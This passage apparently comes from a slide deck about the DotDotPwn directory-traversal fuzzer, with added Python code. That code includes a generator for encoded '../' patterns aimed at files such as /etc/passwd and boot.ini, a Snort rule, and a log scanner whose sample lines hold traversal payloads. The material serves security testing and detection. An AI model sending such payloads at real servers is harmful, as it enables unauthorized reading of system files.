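    extra_files plays the role of additional files such as web.config."""
    if os_type not in TARGET_FILES:
        raise ValueError("os_type must be 'unix' or 'windows'")
    targets = TARGET_FILES[os_type] + tuple(extra_files)
    patterns = []
    for depth in range(1, max_depth + 1):
        for dots, sep in itertools.product(DOT_ENCODINGS, SEPARATOR_ENCODINGS):
            traversal = (dots + sep) * depth
            for target in targets:
                patterns.append(traversal + encode_target(target, sep))
    return patterns


def pattern_count(os_type, max_depth, extra_files=()):
    """Size of the fuzz set without materializing it."""
    n_targets = len(TARGET_FILES[os_type]) + len(extra_files)
    return len(DOT_ENCODINGS) * len(SEPARATOR_ENCODINGS) * n_targets * max_depth


if __name__ == "__main__":
    for p in generate_patterns("windows", 2)[:6]:
        print(p)
    print(pattern_count("unix", 6), "patterns for a *NIX target at depth 6")  # 198
```

`pattern_count` shows why the OS-aware file selection and the -X bisection matter: every extra target file or depth level multiplies the number of requests by the full dots-times-separators product.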
• 35. ../../ Modules HTTP
# DotDotPwn
# snort-2.8.4 - snort-2.9.x, and suricata
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN DotDotPwn User-Agent"; flow: established,to_server; content:"User-Agent|3A| DotDotPwn"; nocase; http_header; threshold: type limit, track by_src, count 1, seconds 60; classtype: attempted-recon; reference:url,dotdotpwn.sectester.net; sid:yyyyyy; rev:1;) C
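The rule above keys on the User-Agent header, which the random User-Agent option (slide 14) is designed to defeat, so a defender also wants to detect the traversal payloads themselves. This added example (not part of the presentation or of DotDotPwn) folds the separator encodings listed on the Traversal Engine slides back to plain slashes, percent-decodes repeatedly so double encodings unfold, and scans web-server access-log lines for the result; it also mirrors the rule's User-Agent match with its "type limit, track by_src, count 1, seconds 60" threshold. The log lines, addresses, timestamps and the "DotDotPwn v3.0" User-Agent string are constructed for the example, and the alias list is this example's assumption rather than the engine's own table.

```python
import re
from datetime import datetime
from urllib.parse import unquote

# Added example, not part of DotDotPwn or the presentation: spot traversal
# attempts in web-server access logs by folding the separator encodings the
# Traversal Engine slides list, and mirror the Snort rule's User-Agent match
# with its per-source "threshold: type limit, count 1, seconds 60" behaviour.

# Separator encodings (lower-case) taken from the patterns on the slides; the
# list itself is this example's assumption, not the engine's own table.
# Multi-byte forms come before their single-byte suffixes so "%c0%2f" is not
# left behind as "%c0/".
SEPARATOR_ALIASES = ("%c0%af", "%c0%2f", "%c1%9c", "%c0%5c",
                     "%u2215", "%uf025", "%5c", "%2f", "\\")


def normalize_path(raw, rounds=3):
    """Lower-case the path, fold every known separator encoding to '/', then
    percent-decode one layer; repeat so double encodings such as %252e or
    %25c1%259c unfold. Stops early once a round changes nothing."""
    path = raw.lower()
    for _ in range(rounds):
        for alias in SEPARATOR_ALIASES:
            path = path.replace(alias, "/")
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(raw):
    """True when a '..' segment followed by a separator survives normalization
    (this also catches the '....//' style, which still contains '../')."""
    return "../" in normalize_path(raw)


# Apache/nginx combined log format: client, ident, user, [time], "request",
# status, bytes, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')


def parse_log_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, path, status, ua = m.groups()
    return {"src": src, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "status": int(status), "ua": ua}


def scan_access_log(lines, ua_window_seconds=60):
    """Return (source, reason, detail) alerts. The User-Agent alert fires at
    most once per source per window, like the Snort threshold; the traversal
    alert fires on every matching request regardless of User-Agent or status,
    since a 404 still shows someone probing."""
    alerts, last_ua_alert = [], {}
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        if "dotdotpwn" in rec["ua"].lower():
            prev = last_ua_alert.get(rec["src"])
            if prev is None or (rec["time"] - prev).total_seconds() >= ua_window_seconds:
                last_ua_alert[rec["src"]] = rec["time"]
                alerts.append((rec["src"], "user-agent", rec["ua"]))
        if is_traversal(rec["path"]):
            alerts.append((rec["src"], "traversal", normalize_path(rec["path"])))
    return alerts


# Constructed sample log (addresses, times, requests and User-Agents are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Apr/2012:10:00:01 -0600] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [20/Apr/2012:10:00:02 -0600] "GET /download.php?file=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1803 "-" "DotDotPwn v3.0"',
    '10.0.0.7 - - [20/Apr/2012:10:00:03 -0600] "GET /download.php?file=%252e%252e%c0%5c%252e%252e%c0%5cboot.ini HTTP/1.1" 404 210 "-" "DotDotPwn v3.0"',
    '10.0.0.7 - - [20/Apr/2012:10:01:30 -0600] "GET /download.php?file=%2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts HTTP/1.1" 200 734 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

On the sample log the User-Agent rule fires once for 10.0.0.7 and is then suppressed for the second request a second later, while the path check flags all three probes, including the last one sent with a browser-looking User-Agent and the one the server answered with 404.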
• 36. ../../ Modules HTTP
  - Additional verification to avoid false positives N
• 39. ../../ Modules FTP
  - Compliance with RFC 959 - File Transfer Protocol
  - Double testing approach:
      - CD <directory> & GET <file>
      - GET <directory><file> N
• 41. ../../ Modules TFTP
  - A little hack in the TFTP.pm module's constructor to improve the testing speed (-t switch in DotDotPwn) N
  • 44. ../../ Upcoming release… DotDotPwn v4.0 …Stay tuned.
• 45. ../../ Greetings
  - r1l0, b0rr3x, l1l1th, chipx0r, preth00nker, NataS, Darko, beck, Daemon, dex, Alination, Carlos Ayala, hkm, calderpwn, tr3w, hecky, raito, BelindoFan etc etc…
  - Helga alt3kx :**
  - Contributors
  - GuadalajaraCON Crew
  - www.underground.org.mx
  - #mendozaaaa
  - CRAc, hkm, alt3kx, tr3w, beck, cldrn, LightOS, xScPx, Daemon, SirDarckCat, Rolman, Crypkey, KBrown, nediam, beavis, kaz, Carlos A. Ayala, corelanc0d3r, Héctor López, Raaka (el_gaupo), dex, Cj, preth00nker, Humberto Ochoa, ch0ks, ran, Federico L. Bossi Bonin, Bucio, javi3r, sunLevy, Zeus, etc… C/N
• 47. ../../ Thanks ! chr1x & nitrØus @ Solar Vision 3 Alejandro Hernández H. (nitrØus), CISSP, GPEN Christian Navarrete (chr1x), GiJOE http://twitter.com/nitr0usmx http://twitter.com/chr1x <nitrousenador@gmail.com> <chr1x@sectester.net> http://chatsubo-labs.blogspot.com http://chr1x.sectester.net http://www.brainoverflow.org